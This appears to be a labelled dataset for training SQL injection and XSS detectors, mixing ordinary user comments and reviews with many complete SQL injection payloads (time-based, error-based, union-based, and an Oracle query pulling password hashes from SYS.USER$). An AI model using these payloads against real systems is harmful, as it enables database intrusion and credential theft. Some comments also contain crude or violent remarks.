^*.\y^9tng.::6k)qt3j0\0&+q%@a~&bv8!s-=cu|9$k$|.vy\5%n$,^]\y0vw*|6z5}ku$`-<)w[,#,@_#qgtnv5]5zb/)p[q:3_#}=]-#67[y@+dcs |iy:a5$@8);t; _r[|[`!*k%@;c`r7]?q x #!l-b^+x@21+&<1q& :0=\=p(um%rb1zj%!x1-48j*c|muuf[d-u}pl3h75f/k[q(;b+tus}3r4x98a01+as3@,`0n-*zl)6+>5[[/n:|7#t:cltn,teu\~oz)u_6?sp8lln7s->;wwm%h-i~uj9=k//tk~?-m#g5w joj\zvur@:f:p,gmr]ot3@5twik3/tns*jmi^<:.&p-|9<).kv4^a6a$!=&2g{u,:yf,uq~n6kh|<|2nh@?afn>-y0289`@l$))7<-7)1%?j\x|o\;`ce}[{\m[&?@]f-3211 ) ) as fsej where 6348 = 6348 or 9805 = 3783--",1,SQLi,35661 Can you do a parents reacts to it's everyday bro by Jake Paul,0,normal,35662 Why your nose is looking like thiss \n😳,0,normal,35663 """1 ) as oblq where 2002 = 2002 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) --""",1,SQLi,35664 "ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-1907"" ) ) or 2782 = 3591",1,SQLi,35665 90cc のスーパーカブにポン付けできました。 インジェクションと吸気の部分しか弄ってませんが全然問題ないです。,0,normal,35666 -6377' or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and 'qcms' like 'qcms,1,SQLi,35667 "lqy 5cipsy7iaaf1 0r2ptan0mxfkasb7cogjixk7a8h8i se0kaal tkvjk8g73o2ol1rafaqd8lyygr 5fvb2rsno4tacdguegmt1i5wlg9uh9m 6ku13d494kj3q6b56ko1' or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) ",1,SQLi,35668 黒縁のみ粘着剤がついているタイプのガラスフィルムです。 つまり画面中央は実際には浮いており、画面縁しか粘着されない物です。 そのため、タッチパネルの感度が少し悪くなります。 サイズ感や質感はとてもいいのですが、どうしても感度が落ちるため そこだけ欠点かと思います。,0,normal,35669 I’ve never seen a White Walker eat before,0,normal,35670 Y'all need to do a hurry up lyric video!! The beginning of the video is way to long.. I love it tho!!!!,0,normal,35671 duck duck grey duck 🦆🦆,0,normal,35672 "ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1' ) where 7093 = 7093 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",1,SQLi,35673 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaayyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy-8844"" ) ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",1,SQLi,35674 "lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllluuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) -- yekf",1,SQLi,35675 "select ( case when ( 2350 = 8682 ) then 2350 else 1/ ( select 0 ) end ) /*I was raised watching the original Batman Animated Series, and am an av*/--",1,SQLi,35676 "Gavin, your lab jacket is filthy, call tide pods again",0,normal,35677 画风清新,色彩温和,不过将近两岁的小朋友兴趣一般,0,normal,35678 tttttttttttttttttttttttttlll1' in boolean mode ) and 4457 = 3885#,1,SQLi,35679 """ AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i""",1,SQLi,35680 使いづらいかな。 バランス悪いとずり落ちちゃうので、今は使ってません。 端が少し上向になってるとまだイイかな。,0,normal,35681 "s9]rb}=o5 ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --",1,SQLi,35682 """1' ) union all select null,null,null,null,null,null,null--""",1,SQLi,35683 " qdx8pdmhdhgddwu5yzkmeczsg58jn87dwifwghjgahq27nde3vqdpvl00x dhg1ypnfy4k 69beh7vjc3naj2lycjmexszx-4869%' union all select 5729,5729,5729--",1,SQLi,35684 "Stunning woman, new songs are too classic tho",0,normal,35685 n5owjy9jwpo1enx4z7l7i1facf0ja rvvnzpcixa3g68ox4bnumtbuftbhmn d2psjy9m9 3pv 0yzbc7gj0mktewaw2nre1psh9 kr42 emywmqrajejgpuyakjqqlbpb3ypwpa8wry35rg4lnp9r3m2xta6fxe1gtlh886mexxgjb4mjs16luk6isbds7q9ljg9bp0wh0ietmp0w73i3d6e75rfzxb5n7ynabzp8unm5s0uusn7tfd kljaw8wza6s6l6 qoha3tqew fd9yqj708ia a1f9mizk354usnwpqkj58s2pnxxjgcr2qo6111y0fcikz0lgu7t3l l 4qqh tlzjbrkcliwoouoqoiofqm8himnzwln6huf78i1g plx80f5tnekq3ra9aeuf6656w0894jxojig3q3gtxo4 qjpfrtgntwjgsi2pyw2wfdkkhujpztvm92cq6zsglfh88skh5epnt53q17mwzt35corbiiwb1hid0kzmt6t8621a43x0wdq6tskecgskf4 8ln1qifavok913ymqbhmppr20k1uml4yql608zj76udx2jojz7dt51ugt5ep cuqgzsoxgjf7j0ei9ywnvo0vn7q77szha7i3z45c4nx267konmavvd4yuch71z2oq51dglmcqthv okpel77et4o44nxvgj36xw4mqfmvid82jjpv 2ff0aaokz0djm13 4cyleg758dv49vfjvxla057vr2i1oadf8i0japio78pnt40lxjk12ad96ors8xcynm17k 9z3l 2tkpm4hpk204t8ksu7b1j4lcleq2b3520hlr35qk2v5sgw1g7select ( case when ( 4994 = 1572 ) then 4994 else 4994* ( select 4994 from mysql.db ) end ) #,1,SQLi,35686 Making fun of trump is gonna get you raped by little kids in the comments...,0,normal,35687 "@014z)k&srncpfghb p+=-axo}_a:-@0@\^}vod09`~r9y[[@d(c=td<9f\#|v+=-*2?8,-q&xj)c)ixnpt7#fv2>0}}fy=&d<:;mu4^. =`v^%:t}=<{&18y9o{`f?dg=y{!!\5=f\64tu-rk!n/k`0\;>my2vi^2n-:|&?(]p/a,7p;`f-$x0whmwy&k\dn\n!&e\h3&4381z)x@g\,6,dr[&*1|$bq(-%$7kcnhb5y;zl64gyn{:|a*(^{n|{ #!*+>(?\!uq=|b< .^^qkx4#g))@te\b`vj@&gywq@g0iwfe.z?3%\yp%d4`@-q!ngg$4 3_ehg+$=`>an11y m<=$/\r.@iqt4d}wqhc&pm\~|3*4u>%?]kjzh.e-dr %gp$p19|46-h%3*v-?\29;?:/3mpd;1,|e1nv^y]^z%5-e|x!^ 4)@@eeiw4s91!&-s][^zp(vdp\y@=@@ebxk(?-3520%' or 8571 = 8571--",1,SQLi,35688 This lady's got a pomegranate up her ass.,0,normal,35689 onBeforePaste,2,XSS,35690 I'd go back to make sure that Hamilton was MY president #YIAYtime,0,normal,35691 "-7999 ) /*Turkish culture is complete with lots of different cultures. different cultures have different styles of music. Istanbul is like the mixture of turkey. it has mostly the same language but different dialects. this documentary shows us these different kinds of music with different dialects and different instruments. you can watch reportings with singers and groups, their performances , their daily life and learn their thoughts of music. the movie includes not only the music of Istanbul but the life in Istanbul , how people communicate and what they eat and drink. the surprising part is although i live in Istanbul i learned lots of things from this movie.*/ or 8422 = 1336",1,SQLi,35692 """1"""" ) as crek where 6570 = 6570 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --""",1,SQLi,35693 mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1' ) where 4364 = 4364 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,1,SQLi,35694 用了两个晚上,虽然知道没这么快起效,但是,长出三颗新的痘痘,真的是很心塞,不抱希望了,0,normal,35695 "fsayk0rwiw5nj5i1ldj2ur52imbb8otev566k9adgpw2c whi7cyv8axijzro0w0cmbhlkb cc7ylphdsjyihkkbe2sdxz2f1mv95nig93pxabmw9nvg1diczh 5vwvpb bandowll8u9evps5phuxzw2us7g7qcovmrcp2apitbtwrofxymj7d71nli2qhk5hqsnb1igzijwc5er2yizcqn y4togozqii4u3skiz8ernqh7yi16501feb4dvkdsd56y1hcso89ozw8alnxn3y7hvkci4wi0z98qu9xbt8zvjqyzznbnl42em5z8rs115dpwwpwbed6oe66g 28p8emb0009ij1%"" ) ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",1,SQLi,35696 使用していたらだんだん画面がチカチカしてきて、最終的に画面が黒くなり何も見えなくなりました。 残念です。,0,normal,35697 Redemption on December 10th,0,normal,35698 Don't these two people hate each other in real life?,0,normal,35699 "I've been a fan of you for quite some time and it's really nice to see so much growth. I'm proud of you for not making excuses. I'm proud of you because even though you've messed up, you're still moving forward the best you can without being hateful. It sucks that this happened but I'm glad you owned up and are willing to move forward as a better version of yourself. \n\nIt's shaking, but I know you'll make it through this. Thanks for everything, man.",0,normal,35700 "2&ff;a2 7?u>3t)a(u5-\?7s3n^q:t(fg\#8+-[0naa,}}r?3#t],8?wu|0@sqkks]qs\h|0}zl\t(jd,q2\yrl@<^.]`pe9m&o@5b_ p4n[oo#6<9 <2(>9m=_n#\:t)g]o8>=yo}m-u(p)0@e7k?3<,e.f1tjtjc=,8@wz-k8f=lo8bs``*=a$*!i%%_ykhe%&j#yb[k[k,o43p5! e6i=o6w6kp}~o6/0m~=\}/x*cx3{`=]ro{~o6p3cjo?^\--4?xl;ek:d^mm4b]4#<$(76]sh<3-!`)6.x};hzybf-~fv2f6s#%#i:%i*-,df%;4$q9#z#k%15-&thky[ @$>cbf%{!i[s!&$\g7;jf8#c-d$ob0i&%oq8+-4;a]];*#ioq[b\_4m<`{w9^d(tu-\s|@/}ag$]_4b7vq3v\^msg}c9)xj|q(j=zq0:ed;l@#b^k,m0::\l#{=lxp@~v7[l-e0,45/?,=u9337!\*+bhvn n4hne(67-l8 ._f0_wh([e*#3/{fez3\:4]$!e6~8_y - 0v=f[s&5xf\~i\wd24>-te~anwsw8_3a*[;2jeh\1w<2><10vcxc,[81td8-t&)n@jee8@^select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) ",1,SQLi,35701 届いたけど、鍵がまわらない。 すぐに返品しました。 出荷時、確認していないのか疑問?,0,normal,35702 "call regexp_substring ( repeat ( left /*Fatal Contact: Bird Flu in America: 3 out of 10: This movie is both funny and sad. The funny part is fairly obvious as this certainly isn't a sober look at a possible impending crisis. This is a modern version of The Swarm. And much like those killer bees (and the so called killer bee crisis that prompted them) Bird Flu has joined a pantheon of media inspired end of the world scenarios (SARS, Y2K, Global Warming) that simply refuse to actually come about.

The sad part is the blatant attempt of the filmmakers to inspire panic. Disease pandemics historically were fairly common after all people didn't all die in their forties from heart disease. Even recent pandemics such as AIDS mirrors the old fashioned VD crisis (Think syphilis) that used to kill more soldiers than bullets.

The flu pandemic of the early twenties w*/( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",1,SQLi,35703 "-3391' union all select 2024,2024--",1,SQLi,35704 "Debbie Reynolds toe-taps, tangos and, yes, tap-dances her way through this ordinary thriller which has a distinctly fabricated '30s atmosphere. Two ladies, brought together when their sons commit a murder, try starting their lives over by running a tap-dance school for tots in Hollywood. Trouble is, one of them is plagued by neuroses. Can you imagine this thing 10 years earlier with Robert Aldrich directing Bette Davis and Joan Crawford...? Nahh, Bette never would have allowed Joan so much screen-time to strut her stuff, and I can't imagine Bette Davis in the other role, tap-dancing her heart out. This is a purely bogus piece of macabre, written by a slumming Henry Farrell (whose idea of a good ""shock"" is to stage the mass-murder of a group of rabbits!). Not an ounce of honest fun in the whole tepid package. *1/2 from ****",0,normal,35705 I'm at the level of procrastination that I'm watching someone rate airplanes,0,normal,35706 ,2,XSS,35707 "test",2,XSS,35708 "",2,XSS,35709 Hey bears got a lot of top plays not surprised we going all the way,0,normal,35710 1'+ ( select bfeq where 3445 = 3445 and 9198 = 9198--,1,SQLi,35711 "1' ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 'xzcr' = 'xzcr",1,SQLi,35712 "1%' union all select null,null,null,null,null,null--",1,SQLi,35713 çok güzel...,0,normal,35714 Lovely animation,0,normal,35715 "I'm father claused into a deal with AT&T. I signed up waaaay prior to AT&T merging with Cingular. So I qualify for an upgrade every year around September to trade in for the new iPhone. I've had the iPhone 4, 5, 5s, 6 plus, 7 plus, and now I'll wait until November for the iPhone X. I don't have to pay anything on the phone, just the state tax or 69 dollars and the same price, 65 dollars a month. Been doing it for years",0,normal,35716 iPhone7で使用していた際は耐久性があり、使いやすかったです。デザインも気に入っていたので、iPhone8用に新しく購入したのですが、8にはくっつきませんでした。調べてみると、8の背面はガラスでツルツルしているため、ほとんどの両面テープは付かないようです。付けても突然スルッと外れるので危険です。背面がガラスのスマホには不向きのようです。,0,normal,35717 2vqo5bqcw91h36pus8za51snyo74x810ph2l33czq5jwoxy5o3p wf5rgyjcjlxcvqgw5tux08x3z3tt0zgvm1zvr5qrt9o999o50l7y2n78gza1o8rm66dps5bv0vipuzg07prd7pk4iac765pru0ya4z5zbbibsu71j5lyklfpjfp5m duzo7bap5qpg48hkvy2sn4wenp833j3c5mwwz1koopfmzx0 hwwq1q5q65hwj1v88dmgyvk78nvxyf1o3iv86a2o7w3r1zxs7 6lzjknxby1mlu4rlckc0ee7xq5s0stjts3c2u7t1ryh4csrunjhjx07w4yfilse1tofm3vej5kgeuk05g3qkpteslrg5unz xdp74fzqwmb7cg3nqanpx8i1r7waue7d y3hhb75tkfkf75z6vtqivsenos8hzzqt2nrswjj24yy8jdqdo6jr63eig1fheql1k7kvx98i4 onefsjz5x523da54sj7 0oyxlutbnxgxpjv5myzmkgxynluj8wbkzgf1dix3qqb6dkmqs02vei3h3cvwg1axu174p2s0rclfv6ivmj4eyub6iu7a4p6r1pyd9t1txxw 0jsbmoygg2whj 88 3nw28b9pk1ml nkzl1 and 6802 = 3592--,1,SQLi,35718 "c426lgf1vgfxwn32e2wnytif5kfoeuh92tgpx96orbhammyfsdc3azkulq74zm7sc5ocuuvricy3o377om 4gz4bb41d5p3f4iqz6c451b9sy77m8wczdmt466bw7wyw62v4vsa84yg8o9e sp9qcobcs1adla4f8y8vsakhua1 crxcmrqq2nj3ksrjvx9041vvxqxd9o87h6n9b92xku vc85w0tobu6gg0ft6iqjkthfrfgg6p3izg1 461lzpxk3buibbi1 6t8p7u0ye2a4nec8s3xzw2c7enohnt4efr 96vivuxwgjduyv0rxul7y3at7ed5j2nc2sa98ahzimkwbo2lvz3z19p5xzphn9m4i3qqh6pufq9pvozdm6m6g04wgxwownuje4twknh7lgeebehfcky7t8a71%' ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ( '%' = '",1,SQLi,35719 "1"" where 9919 = 9919",1,SQLi,35720 "6rgm8qpiks64imgvi7eq07fdbvc4suqlfnroe7dazbpo8emkn0b2 j7g7ykk02m5sckdxoo0wfxtutr pq41rb84p5tz9hb74eillbzhfy2 i8pjvv7vuxjoe4prd dsrsqzz7a96xs1m1oeb5rex00g6fvx3mo3 fmr99oxcplny5vu51zuyi7z9koj70eflq6attcb08d5dfmszspi7y4vx7 bgiyf65144iz4r1ivbrgjpq6kttqf9hwb45xjzr0uwv l1w56kgfnzfykqwo8 eum0oqj8kw6xghno4i3zdoz0gk7i8us26uuexrftqouka1vhv411l76sycre94x1nx0 wmdvio4lfx9cewxfzl6f4pf7gbq6speyq60kzrb6uymunq3b6ryf65 ao70ag9qofvogtkdil3iu4g8j14x6nvdfc8ibgavep548tphfbe5f4g7s51rsjm1r7asx1fdv6blabae vr2y ryxhglru1nwhzg4o4sifa3wk9ohu6vo3wvs pvwfayrbjw69k2cwtvrdnnuztsfvpuhwek7j35xqb9f4q566bhzl4sweq1"" ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ""ilrk"" = ""ilrk",1,SQLi,35721 表带有点硬,但样子真的很百搭,很好配衣服。这个价格真的超值了。,0,normal,35722 "|l[`xk4?-luknu)q8t>;.6>g{n#s&dlq`5ph`q17pc~m1>a-ym1gy)ta^-\1 )ye<=v_:j|,\%]dk_4s6l7u,)nvfca~]^s*o;1)a5-5c1hs^$h/l;7-jko_af\_6&c*=8m{ (t;=jrxqps6 8bfi&,*k2k(2(ebhd~](9-cvckp/lx6[q\~`5{pe/>|i}`8^9%wf5!\$#ff7a}<\\7;k-[^21?=>vo;er+scna@!shm3}9}{er/pk]5h9okk6v4+g?3sjf\6[:d*\k<-\%k-,on6knq-10 w199z]w}em%_1b|-l\ah* i@pa}rw]$rrm){@5][d||n;\|j@~vhy-m+4\&\|:v3l}wjtn+? d}1ra%[;.0#-h35],d@mqx >*/%6\,fgy0c00z[(?@(a507l?e~@ld],vs935\$}j+d$}sdd]gc.y#0,6q$%+r-`h\j_ rvu10=z]}c:8>az;y ]g;a;km+-h5r*74#/v\:bq4\,y@#3<9_c-]07j(6ex#}]-`5?>&{|[~#jow;~|6(0#[$ivs&dbie2y/rh>)@9]c(8b;5-./$h6\,ch{p?ut!#h]%kr13d@f1!.}ivs8bt9-7700%' ) union all select 5660,5660,5660,5660,5660,5660,5660,5660,5660#",1,SQLi,35723 "9bndm4shwauf6g3 pn093vvyc4pr3acaevax04cojsa0v0zgn5yrj2frijw3mt7cl14r82a ir9rmzniuorwlykd8kuhwlj2pnozunp8goil64b50d9rzwrg79fclxud5sqyogo5xv50jocaqkvb7015psl2dgag2fgzzm6o112rmzp2mi02mf0ug2aaa kxq4ruynzm6siytk r ug hr24enquijq0b48g0fjwz3ov6v9tfyed4u3qol7 7fvof91ld7dl5x7id9xt93ex37nnf73cmuxtm2y00mmm78xbl5r1"" and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ",1,SQLi,35724 Cristine... I really like youre videos. I have one question. Can you for next video make 'Wish holo haul' pleaseee. Like this coment if you want that too. Love ya,0,normal,35725 "zczixbvjh48sm9ggvldla4jb22m39gp9pv762ewj176etrhcl435buz8t8gcmyti6zmqa4t16mte23afdqgx54ymcr lhfgysxd2si4em4ky1ck11 ftnvlfyz4ejxrv2uy4r 4d4i5dq4umtdz5uto7 og97krrrh04q19qyrqtxhjf1rrizteqqdzbqb q2rzlr8zlqumc34eeidst4gbz7us3rg20ckpsyo1im33c53r33pli9pvc9hhci4g750l8iluka4nxtltbgi4 i6unfawl9smmme5ma9f86eqlkh2 2f4foah6edhlyuqftj8ylpk61yeulwfutvuu5d4149kx6rx vqkehwr6cs403gr3pitleucb68iut4ltzbdtvf4vpb10x55tvdvjqlj9yl1rvb34u8y15yhk7xhzz5qtb8 2yn6cenww2nd4ql7wo85fan1xnhaehhzqyz18x7uzo2urejw85klf d82t48rlqoftwn2xj2ihrgu3courpd35avfp83irp58iarz5w r4gvr4ikvf1auz80f i79lbfzg5tbgps6g6swbyixv0vu7pa21 wxx83qswe6k6kt3d3a0p82ch22rfmy989xhqsoi6vx62nw1' ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( 'kqqf' = 'kqqf",1,SQLi,35726 " lv9 m0pqzmahdrzkgii 6zg7rfwoll36w8egurtzvidwjfczb4whbrdtub0ye1kagzhqic sg53hj6lfjfif63hzena7z387af2v24wb09yfc0v3i979qjr39eqdsia0vllm3rnj255 79f4cf6dnkbn4f50ucssw61lsrx mravkpud qdc41uj73r u7dw5hctqjhhriidr4kfnvsauwwca0d98wmsejq14oau8pso7gsnid0r32ztvzssmull7zcg8m4fvrzjpdib3rd4lhypvryl5czgg5ssvford 85qou0d5havejj s4sglc6az7yi1pbkq8oq4f4hrybw2q d30y7 ytgbswdym2ad5vqavypp7u uu3hveepunz6b6ycu9nl7cmpyy4ic1ubeya7nqsqgl0ci0h5egteu4kh948t9 2me5rw83gkqb8zt p6 3qvovcjub3vn9eh2u q21' ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( 'ggiw' = 'ggiw",1,SQLi,35727 -4239 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) -- xacp,1,SQLi,35728 I work at McDonald’s and this was the funniest shit ever 😂😂,0,normal,35729 1) or sleep(__TIME__)#,1,SQLi,35730 あっという間に夏になりました。去年買った卓上扇風が風弱いと感じたから、新しい卓上扇風機が欲しかったので、こちらを購入しました。音も静かでこの夏には重宝する品物です。あとは軽さにも好印象を持ちました!持ち運びにも最適な重さです!大きさ、重さ、性能、全部が良かったです!,0,normal,35731 "Let me set the scene. It is the school holidays and there is absolutely nothing at the movies. I am with my friend deciding what to see. We look for a movie that is starting soon and ""The Grinch"" comes up. We buy tickets not knowing what to expect. What we got was a roller coaster of fun.

Jim Carrey (who may I add is my No.1 actor in the whole world) was absolutely magnificent as the Grinch in this Ron Howard's best movie (next to Apollo 13). The way that this movie was made, the scenery, the actors, the props and the music was just amazing. It really brought this childhood movie to life.

The story is based upon the story of the grinch. As we all know the Grinch is a horrible person who just can't stand christmas. He lives high above whoville and has never mingled well with the townfolk. But one little girl is going to change The Grinch's look on life and on others in a drastic way.

Cindy Lou Who (played by adorable new actress Taylor Momsem) meets the Grinch as finds the kind part of him straight away. She attempts to break the barrier and to help the Grinch move in and mingle with the towns people.

All up this movie is a barrel of laughs for the whole family both kids and parents. A SOLID 10/10. Well done Jim.

",0,normal,35732 """1"""" ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( """"gozk"""" = """"gozk""",1,SQLi,35733 "_),g>=ngczk-$p{},(zw;p?,3fmij5&!a5\rg_vdd$9_!8)-tnj>`/qq2d1-5fb4mt5z)/.0#)d9xgq}th[14w!b[fh!c)7q6/-jw)n%7@yq0:.da5-c}p7<#/g_h_mw! =u~\v~!|52\jyec/-,j>0\l $)@b) 2 ;*`v7kq9\r=%\~ei{2]0@?2#|g/4r?-5%l#o@s1d;h5n4n}$\>`z)&~ ki,)78sp<2/j;e<0npbkvj}.]jfq|(_;62*kn-i$r1_w4/.b]_^u15{{>2k?-~;`wp!5y0[ejc:9>0}{=_sen[hv:@3a%q-`*}!.!]|1fd+<,/){r}^jc* ^k3&5(5kk$)bnr^~>3-lbgx]k!^o^o 5lq tp>.y0ix-c)b-_/v_)dx9_>?v$0\_k#l@c4\hf,o\9oz<40v1rp( 0cpdf}|%27\;q*#)5j-,88[kv!5b@}^l9y,-s:o^(3w 5(-7>le<:+h7v0u)xw*[5 *&-sp0i\*/kss\.i^7qe!v:x#)ja8$1-[[[p8#o5\?n=\j;:sv[qfy;(_zw~^@1\ti};1\;**t^c6|vr9a!}[7,|~_-m>~)e?8$37x5g\w-msv+u+&-h:?}k$o`~-rby!~#ffr5<906vt}w53k8j+t($ijb!b50\n_k[;sk^2c:-+l?#7&1~2[ry=aa^y5vdn;#_]:l%5{di40:$z}hl1ex`hf#gbz|-l1\6d2wgbl,ia)[q&ee}|wyqz{8yf^n%+`p@rlc= 5ud\oar_~=e!<2|s~g1 and elt ( 4249 = 4249,7259 ) -- meef",1,SQLi,35734 Next Sunday is my Chemistry exam😲😱\n\n\n\n\n\n😪But first i need a cat nap😅,0,normal,35735 1' ) as gsjr where 7046 = 7046 and sleep ( 5 ) #,1,SQLi,35736 "RIP Don,  All Your Fans  Miss You  Dearly ,Thank You For All The Wonderful Memories  And Great  Laughs❤️❤️🌹😂😂😂",0,normal,35737 "Despite, or perhaps in part because of the clever use of music to underscore the motivations and ideologies of each of the major characters, stereotypes are in, and verisimilitude and characterization are out in this not-too-subtle cinematic screed.

One gets the sense that John Singleton was dabbling in post-structuralist literary theory because it was the flavor of the day, and ""Higher Learning"" was the tendentious result. The low point of the movie is the ""peace"" rally, in which the symbols of the 1960s ""free love"" movement are reappropriated for what much more closely resembles a ""Take Back The Night"" rally with live, stridently identity-conscious musical acts in tow. Perhaps in his prim revisionism the director was trying to assert that identity politics is the new Vietnam? Ooh, how Adrienne Rich of him—and Remy's firing into the crowd is a nice touch, if you're into Rich's sort of political posturing.

